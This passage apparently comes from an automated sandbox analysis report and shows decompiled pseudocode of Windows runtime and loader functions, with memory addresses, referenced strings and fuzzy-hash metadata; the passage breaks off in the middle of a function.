0x053efaff
0x05392ec0
0x05392ec4
0x05392ec6
0x05392ec8
0x053efb14
0x053efb18
0x053efb1e
0x053efb21
0x053efb21
0x05392ece
0x05392ece
0x05392ece
0x05392ed7
0x05392e61
0x05392e63
0x053efa6b
0x053efa71
0x053efa76
0x053efa78
0x053efa8a
0x053efa7a
0x053efa83
0x053efa83
0x053efa8f
0x053efa91
0x053efa97
0x053efa9d
0x053efaa4
0x053efaaa
0x053efaaf
0x053efab1
0x053efac3
0x053efab3
0x053efabc
0x053efabc
0x053efac8
0x053efacb
0x053efadf
0x053efadf
0x053efacb
0x053efaa4
0x053efa91
0x05392e6f
0x05392e6f
0x05392e5f
0x053efa13
0x053efa15
0x053efa17
0x053efa1f
0x053efa21
0x053efa22
0x053efa25
0x053efa28
0x053efa2f
0x053efa2f
0x053efa2a
0x053efa2a
0x053efa2a
0x053efa31
0x053efa34
0x053efa36
0x053efa3c
0x053efa3e
0x053efa41
0x053efa43
0x053efa45
0x053efa45
0x053efa41
0x053efa3c
0x053efa4a
0x053efa4f
0x053efa51
0x053efa53
0x053efa56
0x053efa5b
0x053efa5e
0x00000000
0x053efa5e
0x05392e23

Strings

RTL: Re-Waiting, xrefs: 053EFA4A

Memory Dump Source

Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true

Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: RTL: Re-Waiting
API String ID: 0-316354757
Opcode ID: 17a2f421c13bcd2fcb59280a3e6f764d37ee7d9aa2ccfc8f62e250b530ee0120
Instruction ID: 16f418462906cb6860ec1124513f15230747f022e37d7906bcdb58f7fb12a422
Opcode Fuzzy Hash: 17a2f421c13bcd2fcb59280a3e6f764d37ee7d9aa2ccfc8f62e250b530ee0120
Instruction Fuzzy Hash: E76125B1F04A54ABDB25DF68C885BBF77F6FB84310F14066AE8529B6C0D7B499008B91

Uniqueness

Uniqueness Score: -1.00%

Function 05460EA5, Relevance: 1.4, Strings: 1, Instructions: 153
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E05460EA5(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				void* _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(E0545FF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E05461074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t93);
					_push(0xffffffff);
					_t80 = E053D9730();
					_t115 = _v64;
					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
						E0545A80D(_t115, 1, _v20, _t117);
						_t83 = 4;
					}
				}
				if(E0545A854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0x5488b04 >> 0x14) + (_v44 -  *0x5488b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E053B7D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E0545138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E053B7D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E0544FEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0x5488724 & 0x00000008) != 0) {
						E054552F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E054615B5(0x5488ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}

0x05460eb7
0x05460eb9
0x05460ec0
0x05460ec2
0x05460ecd
0x0546105b
0x0546105b
0x05461061
0x05461066
0x05461066
0x0546106b
0x05461073
0x05461073
0x05460ed3
0x05460ed6
0x05460edc
0x05460ee0
0x05460ee7
0x05460ef0
0x05460ef5
0x05460efa
0x05460efc
0x05460efd
0x05460f03
0x05460f04
0x05460f06
0x05460f07
0x05460f09
0x05460f0e
0x05460f14
0x05460f23
0x05460f2d
0x05460f34
0x05460f34
0x05460f14
0x05460f52
0x00000000
0x00000000
0x05460f58
0x05460f73
0x05460f74
0x05460f79
0x05460f7d
0x05460f80
0x05460f86
0x05460fab
0x05460fb5
0x05460fc6
0x05460fd1
0x05460fe3
0x05460fd3
0x05460fdc
0x05460fdc
0x05460feb
0x05461009
0x05461009
0x05461015
0x05461027
0x05461017
0x05461020
0x05461020
0x0546102f
0x0546103c
0x0546103c
0x05461048
0x05461050
0x05461050
0x05461055
0x00000000
0x05461055
0x05460f88
0x05460f9e
0x05460fa2
0x05460fa9
0x00000000
0x00000000
0x00000000
0x05460fa9
0x00000000

Strings

`, xrefs: 05460F16

Memory Dump Source

Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true

Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: 04e41768da2d6edb9d3ca8693799fbc01c88ef515ed0f04524dafff41d5af94b
Instruction ID: 2e3facf4dc21f8f8496c6d9120122f68a9ab56516387ed94b28ba01fc8a6b39c
Opcode Fuzzy Hash: 04e41768da2d6edb9d3ca8693799fbc01c88ef515ed0f04524dafff41d5af94b
Instruction Fuzzy Hash: 6151DD713083429BD724DF29C988BABB7E5FBC4214F04096EF98687690D770E905CB62

Uniqueness

Uniqueness Score: -1.00%

Function 053CF0BF, Relevance: 1.4, Strings: 1, Instructions: 137
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E053CF0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E053B4120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E053D9830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L053B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E053D9990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E053D95D0();
							goto L11;
						} else {
							_t109 = L053B4620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								E053DF3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E053D95D0();
										L053B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

0x053cf0d3
0x053cf0d9
0x053cf0e0
0x053cf0e7
0x053cf0f2
0x053cf0f4
0x053cf0f8
0x053cf100
0x053cf108
0x053cf10d
0x053cf115
0x053cf116
0x053cf11f
0x053cf123
0x053cf124
0x053cf12c
0x053cf130
0x053cf134
0x053cf13d
0x053cf144
0x053cf14b
0x053cf152
0x0540bab0
0x0540bab0
0x053cf158
0x053cf158
0x053cf15a
0x053cf160
0x053cf165
0x053cf166
0x053cf16f
0x053cf173
0x0540baa7
0x0540baa7
0x0540baab
0x00000000
0x053cf179
0x053cf18d
0x053cf191
0x0540baa2
0x00000000
0x053cf197
0x053cf19b
0x053cf1a2
0x053cf1a9
0x053cf1af
0x053cf1b2
0x053cf1b6
0x053cf1b9
0x053cf1c4
0x053cf1d8
0x053cf1df
0x053cf1e3
0x053cf1eb
0x053cf1ee
0x053cf1f4
0x053cf20f
0x0540bab7
0x0540babb
0x0540bacc
0x0540bad1
0x053cf215
0x053cf218
0x053cf226
0x053cf22b
0x00000000
0x053cf22b
0x053cf1f6
0x053cf1f6
0x053cf1f9
0x053cf1fb
0x053cf1fb
0x053cf1f4
0x053cf191
0x053cf173
0x053cf152
0x053cf203

Strings

@, xrefs: 053CF124

Memory Dump Source

Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true

Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction ID: a4664a6e37e8df2e7f97bfdf70c9db1f1f94f2a9b64c2db89872f970238ab4f5
Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction Fuzzy Hash: 8F515C726047109FD321DF19C840A6BBBF9FF48710F10892EF99597690E7B4E914CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 05413540, Relevance: 1.4, Strings: 1, Instructions: 130
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E05413540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0x548d360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E053D0BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					E05413706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E053DFA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E05413540;
						E053DFA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E053EDDD0( &_v1072, _t75, _t79, _t80, _t81);
						E05420C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						E053D97C0();
					}
					return E053DB640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E05413971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E05413884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E053DFA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = E053D9650();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							E05413787(_a4,  &_v352, _t80);
						}
					}
					L053B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E053D95D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}

0x05413552
0x0541355a
0x0541355d
0x05413566
0x05413567
0x0541357e
0x0541358f
0x054135a1
0x054135a5
0x0541366b
0x0541366b
0x0541366d
0x05413672
0x05413679
0x05413685
0x0541368d
0x0541369d
0x054136a7
0x054136b8
0x054136c6
0x054136c7
0x054136dc
0x054136e1
0x054136e7
0x054136e9
0x054136e9
0x05413703
0x05413703
0x054135b5
0x054135c0
0x054135c4
0x00000000
0x00000000
0x054135ca
0x054135d7
0x054135e2
0x054135e6
0x054135e8
0x054135f5
0x054135fa
0x05413603
0x05413604
0x05413609
0x0541360a
0x05413612
0x05413613
0x0541361e
0x05413622
0x05413628
0x0541362f
0x0541362f
0x05413636
0x05413638
0x0541363b
0x05413642
0x05413642
0x05413636
0x05413657
0x05413657
0x0541365c
0x05413662
0x05413669
0x00000000
0x00000000
0x00000000
0x00000000

Strings

BinaryHash, xrefs: 0541358F

Memory Dump Source

Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true

Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID: BinaryHash
API String ID: 2994545307-2202222882
Opcode ID: ef9d2a24468b2f952e9153e2dca6bef91e99cde1b7da1d00bbf3acd369610abd
Instruction ID: 424c16942c52fe66373dd5c37bb53f7c11262f4c426a94253cf9b2d872e740bf
Opcode Fuzzy Hash: ef9d2a24468b2f952e9153e2dca6bef91e99cde1b7da1d00bbf3acd369610abd
Instruction Fuzzy Hash: 424125F2D0052C9BDB21DE50DC85FEEB77CAB44714F0045E6EA09A7240DB309E888FA8

Uniqueness

Uniqueness Score: -1.00%

Function 05413884, Relevance: 1.3, Strings: 1, Instructions: 95
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E05413884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = E053D9650();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L053B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L053B4620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = E053D9650();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}

0x05413893
0x05413896
0x05413899
0x0541389f
0x054138a0
0x054138a4
0x054138a9
0x054138ac
0x054138ad
0x054138ae
0x054138af
0x054138b1
0x054138b4
0x054138bb
0x054138bc
0x054138bd
0x054138c4
0x054138c8
0x054138ca
0x054138ca
0x054138d5
0x0541393e
0x05413940
0x05413942
0x05413952
0x05413954
0x05413961
0x05413961
0x05413967
0x0541396e
0x0541396e
0x05413947
0x0541394c
0x00000000
0x0541394c
0x054138ea
0x054138ee
0x054138f8
0x054138f9
0x054138ff
0x05413900
0x05413902
0x05413903
0x0541390b
0x0541390f
0x05413950
0x00000000
0x05413950
0x05413915
0x0541391d
0x0541391d
0x05413922
0x05413926
0x00000000
0x05413928
0x0541392b
0x0541392b
0x05413935
0x05413937
0x05413937
0x00000000
0x05413935
0x05413926
0x054138f0
0x00000000

Strings

BinaryName, xrefs: 054138B4

Memory Dump Source

Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true

Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID: BinaryName
API String ID: 2994545307-215506332
Opcode ID: bcb07029bdcc9b98946357c0226d5dc8e7092886cf5d101b2eaafd2d4fc5ddac
Instruction ID: 1706a118cb7b6d047eded1524166f0b78e42994a24098aebfc77b96ba7ad352c
Opcode Fuzzy Hash: bcb07029bdcc9b98946357c0226d5dc8e7092886cf5d101b2eaafd2d4fc5ddac
Instruction Fuzzy Hash: 6F31F172D04509AFEB15DE58C945EBBB7B5FB80B20F01456AED16A7350D7309E00C7A4

Uniqueness

Uniqueness Score: -1.00%

Function 053CD294, Relevance: 1.3, Strings: 1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 33%

			E053CD294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0x548d360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E053B4120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return E053DB640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E053D98D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E053D95D0();
					L053B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L053B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

0x053cd29c
0x053cd2a6
0x053cd2b1
0x053cd2b5
0x053cd2b6
0x053cd2bc
0x053cd2bd
0x053cd2be
0x053cd2bf
0x053cd2c2
0x053cd2c4
0x053cd2cc
0x053cd384
0x053cd34b
0x053cd34f
0x053cd350
0x053cd351
0x053cd35c
0x053cd35c
0x053cd2d6
0x053cd2da
0x053cd2e1
0x053cd361
0x053cd369
0x053cd36d
0x053cd2e3
0x053cd2e3
0x053cd2e3
0x053cd2e5
0x053cd2ed
0x053cd2f5
0x053cd2fa
0x053cd302
0x053cd303
0x053cd30b
0x053cd30f
0x053cd313
0x053cd318
0x053cd31c
0x053cd320
0x053cd379
0x053cd37d
0x00000000
0x00000000
0x0540affe
0x0540b001
0x0540b011
0x00000000
0x053cd322
0x053cd322
0x053cd330
0x053cd337
0x053cd35d
0x053cd339
0x053cd33f
0x053cd38c
0x053cd38c
0x053cd33f
0x053cd349
0x00000000
0x053cd349

Strings

@, xrefs: 053CD303

Memory Dump Source

Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true

Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 239cd90740ed39b34b0221026409eeab770f9301b748c37c850095b422276c4b
Instruction ID: db1569467a474595b0061fb49446849fd1da9ab8f3fdbd377e98bc90864e5478
Opcode Fuzzy Hash: 239cd90740ed39b34b0221026409eeab770f9301b748c37c850095b422276c4b
Instruction Fuzzy Hash: DA31BFB26083859FC311DF68C984AABFFE9FB89654F00097EF99583650D634DD05CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 053A1B8F, Relevance: 1.3, Strings: 1, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E053A1B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;

				_t27 = __ecx;
				_t29 = __edx;
				_t31 = 0;
				_v8 = __edx;
				if(__edx == 0) {
					L18:
					_t30 = 0xc000000d;
					goto L12;
				} else {
					_t26 = _a4;
					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
						goto L18;
					} else {
						E053DBB40(__ecx,  &_v16, __ecx);
						_push(_t26);
						_push(0);
						_push(0);
						_push(_t29);
						_push( &_v16);
						_t30 = E053DA9B0();
						if(_t30 >= 0) {
							_t19 =  *_t26;
							if( *_t26 != 0) {
								goto L7;
							} else {
								 *_a8 =  *_a8 & 0;
							}
						} else {
							if(_t30 != 0xc0000023) {
								L9:
								_push(_t26);
								_push( *_t26);
								_push(_t31);
								_push(_v8);
								_push( &_v16);
								_t30 = E053DA9B0();
								if(_t30 < 0) {
									L12:
									if(_t31 != 0) {
										L053B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
									}
								} else {
									 *_a8 = _t31;
								}
							} else {
								_t19 =  *_t26;
								if( *_t26 == 0) {
									_t31 = 0;
								} else {
									L7:
									_t31 = L053B4620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
								}
								if(_t31 == 0) {
									_t30 = 0xc0000017;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				return _t30;
			}

0x053a1b8f
0x053a1b9a
0x053a1b9c
0x053a1b9e
0x053a1ba3
0x053f7010
0x053f7010
0x00000000
0x053a1ba9
0x053a1ba9
0x053a1bae
0x00000000
0x053a1bc5
0x053a1bca
0x053a1bcf
0x053a1bd0
0x053a1bd1
0x053a1bd2
0x053a1bd6
0x053a1bdc
0x053a1be0
0x053f6ffc
0x053f7000
0x00000000
0x053f7006
0x053f7009
0x053f7009
0x053a1be6
0x053a1bec
0x053a1c0b
0x053a1c0b
0x053a1c0c
0x053a1c11
0x053a1c12
0x053a1c15
0x053a1c1b
0x053a1c1f
0x053a1c31
0x053a1c33
0x053f7026
0x053f7026
0x053a1c21
0x053a1c24
0x053a1c24
0x053a1bee
0x053a1bee
0x053a1bf2
0x053a1c3a
0x053a1bf4
0x053a1bf4
0x053a1c05
0x053a1c05
0x053a1c09
0x053a1c3e
0x00000000
0x00000000
0x00000000
0x053a1c09
0x053a1bec
0x053a1be0
0x053a1bae
0x053a1c2e

Strings

WindowsExcludedProcs, xrefs: 053A1BC5

Memory Dump Source

Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true

Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: WindowsExcludedProcs
API String ID: 0-3583428290
Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
Instruction ID: 367fa89e9efc6fcbed087a2d299fdbc52fafd1d849a4b10ac109a40e5b8794c7
Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
Instruction Fuzzy Hash: 5C21F537A00229ABEB22EA55C984FAFF7BEFF80A50F054425FA058B600D770DC00C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 053BF716, Relevance: 1.3, Strings: 1, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E053BF716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				signed char _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr* _t25;

				_t25 = _a8;
				_t17 = __ecx;
				if(_t25 == 0) {
					_t19 = 0xc00000f2;
					L8:
					return _t19;
				}
				if((__ecx & 0xfffffffe) != 0) {
					_t19 = 0xc00000ef;
					goto L8;
				}
				_t19 = 0;
				 *_t25 = 0;
				_t21 = 0;
				_t23 = "Actx ";
				if(__edx != 0) {
					if(__edx == 0xfffffffc) {
						L21:
						_t21 = 0x200;
						L5:
						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
						 *_t25 = _t13;
						L6:
						if(_t13 == 0) {
							if((_t17 & 0x00000001) != 0) {
								 *_t25 = _t23;
							}
						}
						L7:
						goto L8;
					}
					if(__edx == 0xfffffffd) {
						 *_t25 = _t23;
						_t13 = _t23;
						goto L6;
					}
					_t13 =  *((intOrPtr*)(__edx + 0x10));
					 *_t25 = _t13;
					L14:
					if(_t21 == 0) {
						goto L6;
					}
					goto L5;
				}
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 =  *(_t14 + 0x14) & 0x00000007;
					if(_t16 <= 1) {
						_t21 = 0x1f8;
						_t13 = 0;
						goto L14;
					}
					if(_t16 == 2) {
						goto L21;
					}
					if(_t16 != 4) {
						_t19 = 0xc00000f0;
						goto L7;
					}
					_t13 = 0;
					goto L6;
				} else {
